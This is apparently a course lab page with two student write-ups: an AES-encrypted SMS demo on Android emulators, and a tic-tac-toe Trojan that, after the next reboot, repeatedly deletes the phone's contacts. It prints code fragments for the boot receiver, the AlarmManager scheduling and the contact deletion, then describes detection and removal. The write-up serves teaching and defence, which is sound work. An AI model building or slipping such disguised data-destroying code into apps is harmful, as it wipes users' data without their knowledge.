Open two emulators on your eclipse. Run the Android Project "EncDecSMS" on both emulators. Emulator1 serves as a sender which sends encrypted short message to Emulator 2. Emulator 2 serves as receiver which receives the short message from Emulator 1 and decrypts the received cipher text message. Upon starting the activity, since we will use Emulator 1 to send the short message, we should press "Cancel" button on Emulator 2 in order for Emulator 2 to receive the message. On Emulator 1 we fill in the corresponding information such as recipient, 16-character AES secret key and the message body. Here, one thing should be noticed: the AES secret key should be a 16-character input. This is because the AES encryption algorithm we use is a 128-bit block cipher which must uses a 128-bit, a 192-bit or a 256-bit secret key. Here we set it to only accept a 16-character (128-bit) secret key for simplicity and we use "1111111111111111" as secret key for demonstration.
After filling these information, the user can press "Send" button and then the message is sent to Emulator 2. Upon receiving, the Emulator 2 is as the following:
On Emulator 2 we can see that, the sender's phone number and the received encrypted messages has been filled on those text fields. Then, the user should input the secret key in the input box in order to use it to decrypt the message. The secret key should be the same as the one which is used to encrypt the message, the one "1111111111111111". After filling in a correct secret key in the box, press "Submit" button and the decrypted message should appear.
By Sam Rothermel He chose a tic tac toe game, and has it delete the users contact list as the attack. Instead of it just going through and deleting once, the Trojan would run a background service on the phone and periodically delete every few minutes. Furthermore, to disconnect the link between the app being the source of the Trojan, he set it up to only run after the next boot. Firstly, a simple tic tac toe program was obtained from open source here: http://www.edumobile.org/android/android-development/tictactoe-game-implementation/ Credit goes to Sushant for the code. Whilehe borrowed the code for the tic tac toe app, the code for the Trojan is his own work. these permissions are added in the Manifest.xml file:
"android.permission.READ_CONTACTS" />
"android.permission.WRITE_CONTACTS" />
"android.permission.RECEIVE_BOOT_COMPLETED"/>
The READ/WRITE_CONTACTS are for accessing and changing the contact info on the phone; the RECEIVE_BOOT_COMPLETED is for when the phone starts up, which is when the attack began.
Also, a BOOT_COMPLETED intent-filter was needed to fire when the device first starts up and have it call the receiver that sets up the attack. And then register another receiver for running the service periodically (so it never quits), and the service for performing the attack.
".StartAttack" >
"android.intent.action.BOOT_COMPLETED" />
Next, set up classes. In StartAttack.java, which is the class called when the next boot happens so long as the app is installed, the first critical lines are given below:
AlarmManager service = (AlarmManager)context.getSystemService(Context.ALARM_SERVICE); Intent i = new Intent(context, RunTrojan.class);
PendingIntent pending = PendingIntent.getBroadcast(context, 0, i, PendingIntent.FLAG_CANCEL_CURRENT);
service.setInexactRepeating(AlarmManager.RTC_WAKEUP,cal.getTimeInMillis(), TIME, pending);
AlarmManager sets up Alarm Service, which is something that periodically “wakes up” the phone when it needs to do something after it’s gone into sleep mode. Also call PendingIntent, which is an intent that works off the alarm when it fires to call a broadcast receiver. Finally, call .setInexactRepeating, which fires the intent periodically until the AlarmManager service is killed.
Next the RunTrojan class captures the repeating intent to fire our Trojan class. Inside the Trojan class, we run this code:
Uri uri = Uri.withAppendedPath(ContactsContract.Contacts.CONTENT_LOOKUP_URI, lookupKey);
contentResolver.delete(uri, null, null);
}
This gets our phones contacts, goes through all of them, and deletes them in one simple while loop. This is where the attack happens. Now on to the demo:
First shot is of the phone’s contacts properly in place. Second is of the tic tac toe app being run for the first time. User is unaware of any connection between these programs.
After restarting the phone, the contacts are still there if you go to them immediately, but the service always waits a couple minutes before it strikes. Left image is a few minutes after restarting phone, user did not delete contacts, they just disappeared. In fact, if you’re watching the contacts page on the phone they will all vanish instantly. Now to make sure the attack keeps happening, reset up a couple contacts in the right picture. Sure enough, after a few more minutes they disappear again!
Malware Defence:
Now comes to how we can identify and remove it. Deleting the app is enough to get rid of the Trojan, we can alternatively stop the service so long as we identify it as the culprit. Using LBE Privacy Guard, we can see that TicTacTrojan is accessing our Contacts, something you wouldn’t normally expect a game to do. Using the active protection feature, we can prompt the user whenever the app tries to access our contacts, thereby revealing what it’s attempting to do and possibly saving it from harm. We can also see the app is being run as a service even though we never started it after boot, making it appear very suspicious even without any sort of protective software. There are also programs, such as BackupContacts found here:https://play.google.com/store/apps/details?id=no.uia.android.backupcontacts&hl=en that can backup our contact lists in case they ever become compromised. Mobile Backup II was another one we covered in the labs that could be used for contacts.
First picture shows that TicTacTrojan is possibly accessing contacts in a malicious manner. Second pic shows the app is running after phone reboot even though I never started it. Note that it starts latter because of the buffer time in AlarmManager set up.